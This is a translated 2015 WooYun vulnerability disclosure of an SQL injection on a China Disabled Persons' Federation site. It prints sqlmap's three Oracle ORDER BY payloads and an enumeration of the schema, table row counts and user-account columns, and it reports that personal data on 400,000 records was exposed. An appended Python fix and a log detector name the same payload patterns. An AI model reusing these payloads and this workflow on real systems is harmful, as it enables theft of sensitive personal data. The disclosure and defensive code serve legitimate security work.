
Vulnerability summary

Defect ID: wooyun-2015-0162998

Title: High-risk SQL injection on the main site of the China Disabled Persons' Federation Information Center, exposing a large volume of user data (usernames, passwords, email addresses, ID card numbers, mobile numbers, home addresses, etc.)

Affected vendor: China Disabled Persons' Federation (中国残疾人联合会)

Reporter: 路人甲

Submitted: 2015-12-21 00:16

Fixed: 2016-02-07 17:56

Published: 2016-02-07 17:56

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 16

Status: handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-12-21: Details reported to the vendor; awaiting vendor response
2015-12-25: Vendor confirmed; details disclosed to the vendor only
2016-01-04: Details disclosed to core white hats and domain experts
2016-01-14: Details disclosed to regular white hats
2016-01-24: Details disclosed to intern white hats
2016-02-07: Details disclosed to the public

Brief description:

The main site of the China Disabled Persons' Federation Information Center has a high-risk SQL injection vulnerability that exposes 400,000 sensitive records (usernames, passwords, email addresses, ID card numbers, mobile numbers, home addresses, etc.)...

Detailed description:

A scan turned up an injection point; running sqlmap against it directly dumped the site's entire database: 400,000 records of important information, including usernames, passwords, email addresses, ID card numbers, mobile numbers, home addresses and so on. Logging in with a username and password shows the registrant's detailed information... a large amount of important site data is exposed...
Injection point: http://**.**.**.**//jjproduct/jjProductSercher.htm?orderstr=update_date%20desc

sqlmap identified the following injection point(s) with a total of 69 HTTP(s) requests:
---
Parameter: orderstr (GET)
    Type: boolean-based blind
    Title: Oracle boolean-based blind - ORDER BY, GROUP BY clause
    Payload: orderstr=update_date desc,(SELECT (CASE WHEN (8391=8391) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

    Type: error-based
    Title: Oracle error-based - ORDER BY, GROUP BY clause
    Payload: orderstr=update_date desc,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (4258=4258) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(113)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL)

    Type: AND/OR time-based blind
    Title: Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)
    Payload: orderstr=update_date desc,(SELECT (CASE WHEN (9556=9556) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(118)||CHR(74)||CHR(97),5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
---
[21:41:57] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
current user: 'CDPSN_PROJECT_J2EE'
current schema (equivalent to database on Oracle): 'CDPSN_PROJECT_J2EE'
available databases [22]:
[*] CDPSN_PROJECT_J2EE
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] PROJECT_J2EE
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
database management system users [29]:
[*] ANONYMOUS
[*] BI
[*] CDPSN_PROJECT_J2EE
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] PROJECT_J2EE
[*] SCOTT
[*] SH
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: CDPSN_PROJECT_J2EE
[125 tables]
+----------------------------+
| ADDRESS |
| ADMIN_CHANNEL_ROLE |
| ADMIN_LOG |
| ADMIN_ROLE |
| ADMIN_USER |
| ADMIN_USER_ROLE |
| APPLY2013_FALSE |
| APPLY2013_TRUE |
| AREA |
| BLIND_MASSAGE_ORG |
| CDPSN_VIEW_FZQJW_CLASSINFO |
| CDPSN_VIEW_FZQJW_CP |
| CDPSN_VIEW_FZQJW_CS |
| CDPSN_VIEW_FZQW_JXS |
| CHANNEL |
| CHANNEL_THUMBNAIL |
| CHANNEL_TOP_CONFIG |
| CHARITY_AGENT |
| CHARITY_USER |
| CHECK_PROCESS |
| CHECK_STEP |
| COMMENTS |
| CONNTENT_TOP_DATA |
| CONTENT |
| CONTENT_ATTACHMENT |
| CONTENT_CHECK_RECORD |
| CONTENT_COMMENT |
| CONTENT_MULTI |
| CONTENT_TAG |
| CONTENT_TAG_RELATIONSHIP |
| DEMAND |
| DEMAND_TEMP |
| DISABLED_FOSTER_ORG |
| DISABLED_WELFARE_ORG |
| DISABLE_TYPE |
| DISTRIBUTION |
| DONATION |
| DONATION_CLASSINFO |
| DONATION_GOODS |
| DONATION_RECEIVER |
| DONATION_REQUEST_GOODS |
| DONATION_TEMP |
| DONATION_TRANS |
| EXAM_JOB_USER |
| EXAM_RESULT |
| EXPERT_UPLOAD |
| FEEDBACK |
| GOODS_NEXUS |
| GOODS_SORT |
| JJ_AREA |
| JJ_CERTIFICATE |
| JJ_CYJYWD |
| JJ_CYJYZJ |
| JJ_CYZDSM |
| JJ_ENTERPRISE |
| JJ_ENTPRISE_ANNOUCE |
| JJ_EP_CONTACT |
| JJ_EP_INCOME |
| JJ_EP_SCENE |
| JJ_EP_TYPE |
| JJ_FOCUS_PICTURE |
| JJ_FWJG |
| JJ_FWJG_AREA |
| JJ_LEAVE_MESSAGE |
| JJ_PD_CATEGORY |
| JJ_PD_CATEGORY_BAK |
| JJ_PRISE_RANGE |
| JJ_PRODUCT |
| JJ_PRODUCT_KEYWORD |
| LAW_MESSAGE |
| LAW_MESSAGE_2 |
| LAW_RESOURCE |
| LETTER_INBOX |
| LETTER_OUTBOX |
| LETTER_OUTBOX_DRAFT |
| LETTER_TEXT |
| LINKS |
| LINKSEARCH_LOG |
| LINKS_APPLY |
| LINKS_CLASSINFO |
| LINKS_FEEDBACK |
| LINKS_LOG |
| MEMBER_COMPANY |
| MEMBER_CONFIRM_LOG |
| MEMBER_ROLE |
| MEMBER_USER |
| MEMBER_USER_INFO |
| MEMBER_USER_ROLE |
| ORG_CONTACT |
| ORG_DIRECTORY |
| ORG_MULTIMEDIA |
| ORG_PRODUCT |
| ORG_RESOURCE |
| PD_CATEGORY |
| POLLER |
| POLLER_OPTION |
| POLLER_VOTE |
| PUBLIC_WELFARE_PROJECT |
| RECORD_LOGIN_LOG |
| RECORD_MODIFY_LOG |
| RECORD_REQUEST_LOG |
| RECORD_SESSION_LOG |
| RURAL_ASSIST_ORG |
| SNS_CAREE |
| SNS_COMMENT |
| SNS_FEED |
| SNS_FEED_CONFIG |
| SNS_FEED_TYPE |
| SNS_FRIEND |
| SNS_FRIEND_CLASS |
| SNS_NOTIFICATION |
| SNS_SECRET |
| SNS_USER |
| SNS_VISITOR |
| STANDARD_DATA |
| SYS_CODE |
| SYS_PARA |
| TEMP_PROCESS |
| USER_TEST |
| VIP_PHOTO |
| VIP_REPLY |
| VIP_RESOURCE |
| VIP_TRACK |
| VOTE2013_FALSE |
| VOTE2013_TRUE |
+----------------------------+


[Screenshots: 2.png, 3.png, 4.png, 23.png, 5.png]


Proof of vulnerability:

QQ numbers, usernames, passwords, mobile numbers, email addresses and other sensitive information...
Logging in to the interface shows detailed user information: ID card numbers, mobile numbers, home addresses, etc...

Database: CDPSN_PROJECT_J2EE
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| SNS_FEED_CONFIG | 420149 |
| RECORD_LOGIN_LOG | 171983 |
| MEMBER_USER_ROLE | 52862 |
| MEMBER_USER | 52836 |
| SNS_USER | 52836 |
| MEMBER_CONFIRM_LOG | 38357 |
| SNS_SECRET | 35296 |
| CONTENT | 27863 |
| LINKS_LOG | 24637 |
| LAW_MESSAGE | 22829 |
| CONTENT_MULTI | 21242 |
| CONTENT_CHECK_RECORD | 17420 |
| CHARITY_USER | 15862 |
| MEMBER_USER_INFO | 14700 |
| SNS_NOTIFICATION | 13959 |
| ADDRESS | 13920 |
| EXAM_RESULT | 13513 |
| ORG_DIRECTORY | 8051 |
| LINKSEARCH_LOG | 7573 |
| SNS_FEED | 7514 |
| DONATION_GOODS | 5611 |
| FEEDBACK | 5525 |
| LETTER_TEXT | 5168 |
| SNS_FRIEND | 5123 |
| ADMIN_LOG | 5085 |
| LETTER_INBOX | 4864 |
| LETTER_OUTBOX | 4687 |
| MEMBER_COMPANY | 4440 |
| CONTENT_TAG_RELATIONSHIP | 4010 |
| LINKS | 3397 |
| JJ_AREA | 2973 |
| SNS_VISITOR | 2933 |
| JJ_FWJG | 2885 |
| JJ_FWJG_AREA | 2779 |
| JJ_EP_SCENE | 1827 |
| ORG_MULTIMEDIA | 1623 |
| DONATION_RECEIVER | 1586 |
| DONATION_TRANS | 1586 |
| CHARITY_AGENT | 1566 |
| RECORD_SESSION_LOG | 1483 |
| JJ_PRODUCT | 1334 |
| POLLER_VOTE | 1261 |
| ORG_PRODUCT | 1167 |
| CDPSN_VIEW_FZQJW_CLASSINFO | 1122 |
| PD_CATEGORY | 1122 |
| CDPSN_VIEW_FZQJW_CP | 1048 |
| LINKS_CLASSINFO | 904 |
| JJ_PD_CATEGORY | 818 |
| JJ_ENTERPRISE | 663 |
| JJ_EP_CONTACT | 492 |
| CONNTENT_TOP_DATA | 486 |
| TEMP_PROCESS | 485 |
| AREA | 434 |
| SNS_COMMENT | 426 |
| JJ_CERTIFICATE | 363 |
| ORG_CONTACT | 361 |
| DONATION_REQUEST_GOODS | 341 |
| DEMAND | 314 |
| ADMIN_USER_ROLE | 285 |
| APPLY2013_FALSE | 283 |
| VIP_REPLY | 231 |
| VOTE2013_TRUE | 204 |
| VIP_TRACK | 192 |
| LAW_MESSAGE_2 | 186 |
| USER_TEST | 184 |
| GOODS_SORT | 172 |
| CHANNEL | 150 |
| VOTE2013_FALSE | 135 |
| DISABLED_WELFARE_ORG | 116 |
| ADMIN_USER | 111 |
| DEMAND_TEMP | 107 |
| JJ_EP_INCOME | 103 |
| GOODS_NEXUS | 98 |
| RURAL_ASSIST_ORG | 96 |
| APPLY2013_TRUE | 84 |
| VIP_PHOTO | 82 |
| BLIND_MASSAGE_ORG | 75 |
| DISABLED_FOSTER_ORG | 74 |
| SYS_CODE | 68 |
| DONATION | 56 |
| JJ_CYJYWD | 50 |
| CDPSN_VIEW_FZQJW_CS | 47 |
| DONATION_TEMP | 47 |
| POLLER_OPTION | 47 |
| EXPERT_UPLOAD | 45 |
| ORG_RESOURCE | 44 |
| DONATION_CLASSINFO | 41 |
| CDPSN_VIEW_FZQW_JXS | 37 |
| CONTENT_TAG | 36 |
| ADMIN_CHANNEL_ROLE | 35 |
| JJ_LEAVE_MESSAGE | 33 |
| LETTER_OUTBOX_DRAFT | 31 |
| PUBLIC_WELFARE_PROJECT | 30 |
| CHANNEL_TOP_CONFIG | 27 |
| EXAM_JOB_USER | 26 |
| ADMIN_ROLE | 21 |
| SNS_FRIEND_CLASS | 21 |
| CONTENT_ATTACHMENT | 18 |
| JJ_FOCUS_PICTURE | 18 |
| LAW_RESOURCE | 13 |
| JJ_PD_CATEGORY_BAK | 11 |
| RECORD_REQUEST_LOG | 11 |
| JJ_CYZDSM | 10 |
| POLLER | 9 |
| COMMENTS | 8 |
| DISTRIBUTION | 7 |
| DISABLE_TYPE | 6 |
| MEMBER_ROLE | 5 |
| CHECK_PROCESS | 4 |
| CHECK_STEP | 4 |
| JJ_EP_TYPE | 4 |
| SNS_FEED_TYPE | 4 |
| JJ_CYJYZJ | 1 |
| JJ_ENTPRISE_ANNOUCE | 1 |
| VIP_RESOURCE | 1 |
+----------------------------+---------+
Database: CDPSN_PROJECT_J2EE
Table: MEMBER_USER
[31 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| IDENTITY | NUMBER |
| AUTH_CODE | VARCHAR2 |
| CONFIRM_DATE | DATE |
| CREATE_DATE | DATE |
| DIMINUTIVE | VARCHAR2 |
| ENABLED | NUMBER |
| ENTRANCE | NUMBER |
| IDENTIFICATION_TYPE | NUMBER |
| IS_EMAIL | NUMBER |
| IS_LOGINID | NUMBER |
| IS_MOBILE | NUMBER |
| LAST_LOGINDATE | DATE |
| LAST_LOGINIP | VARCHAR2 |
| LOGIN_ID | VARCHAR2 |
| LOGIN_TIMES | NUMBER |
| MEMBER_ID | NUMBER |
| MOBILE | NUMBER |
| MOBILE_OPEN_FLG | VARCHAR2 |
| ONLINE_TIME | NUMBER |
| ORIGINAL | VARCHAR2 |
| PASSWORD | VARCHAR2 |
| PATTERN | NUMBER |
| PHONE_NUMBER | VARCHAR2 |
| QQ | NUMBER |
| REGISTER_WAY | NUMBER |
| RELATIONSHIP | NUMBER |
| SAVED_IDENTIFY_TYPE | NUMBER |
| STATUS | NUMBER |
| UPDATE_DATE | DATE |
| USER_EMAIL | VARCHAR2 |
| USER_TYPE | NUMBER |
+---------------------+----------+


[Screenshots: 7.png, 8.png, 9.png, 10.png, 11.png, 12.png, 13.png, 14.png, 15.png]


Fix suggestion:

Just fix it...
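The report leaves the fix at "just fix it". As an added example (not the reporter's or the site's code), the Python below shows what actually closes an ORDER BY injection like the one in orderstr: sort identifiers cannot be bound as query parameters, so the parameter is parsed, mapped onto an allow-list and the SQL rebuilt from known constants. It also carries a small access-log check for the three payload shapes sqlmap reported (a comma-appended subquery, CHR() concatenation chains, DBMS_PIPE.RECEIVE_MESSAGE). The allowed column names and the log lines are constructed for the example; the same allow-list logic applies directly to the site's JSP code.

```python
import re
from urllib.parse import unquote

# Allow-list for the product search page's sort parameter. These column names are
# constructed for the example (UPDATE_DATE is the one the reported URL sorts on).
ALLOWED_SORT_COLUMNS = {"update_date", "create_date", "product_name"}

# Exactly one sort key: identifier, optional whitespace, optional direction.
_SORT_KEY = re.compile(r"^\s*([A-Za-z_]\w*)(?:\s+(asc|desc))?\s*$", re.IGNORECASE)


def build_order_by(orderstr: str) -> str:
    """Map a user-supplied sort parameter onto a fixed ORDER BY fragment.
    ORDER BY identifiers cannot be bound as query parameters, so the input is
    parsed, checked against the allow-list, and the SQL is rebuilt from the
    matched constants. Raises ValueError for anything but 'column [asc|desc]'.
    """
    m = _SORT_KEY.match(orderstr)
    if not m:
        raise ValueError("rejected sort parameter")
    column, direction = m.group(1).lower(), (m.group(2) or "asc").lower()
    if column not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unknown sort column")
    return f"ORDER BY {column.upper()} {direction.upper()}"


# Indicators for the three payload families sqlmap reported against orderstr: a
# second comma-separated sort expression opening a subquery, CHR() concatenation
# chains, and DBMS_PIPE.RECEIVE_MESSAGE used as a delay primitive.
_INDICATORS = [
    re.compile(r"orderstr=[^&]*,\s*\(?\s*select\b", re.IGNORECASE),
    re.compile(r"chr\(\d+\)\s*\|\|\s*chr\(\d+\)", re.IGNORECASE),
    re.compile(r"dbms_pipe\.receive_message", re.IGNORECASE),
]


def flag_order_by_injection(log_line: str) -> bool:
    """True when a URL-decoded access-log line matches any indicator."""
    return any(p.search(unquote(log_line)) for p in _INDICATORS)


# Constructed access-log lines (not taken from the report) for the detector.
SAMPLE_LOG_LINES = [
    "GET /jjproduct/jjProductSercher.htm?orderstr=update_date%20desc HTTP/1.1",
    "GET /jjproduct/jjProductSercher.htm?orderstr=update_date%20desc,(SELECT%20(CASE"
    "%20WHEN%20(8391=8391)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL) HTTP/1.1",
    "GET /jjproduct/jjProductSercher.htm?orderstr=update_date%20desc,(SELECT%20"
    "DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)%7C%7CCHR(118),5)%20FROM%20DUAL) HTTP/1.1",
]


def flagged_indices(lines):
    """Indices of the log lines that match at least one indicator."""
    return [i for i, line in enumerate(lines) if flag_order_by_injection(line)]
```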

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-12-25 11:01

Vendor reply:

CNVD has confirmed and reproduced the reported situation and has notified the site operator by email through its publicly listed contact channel; the operator will provide a remediation plan.

Latest status:

None yet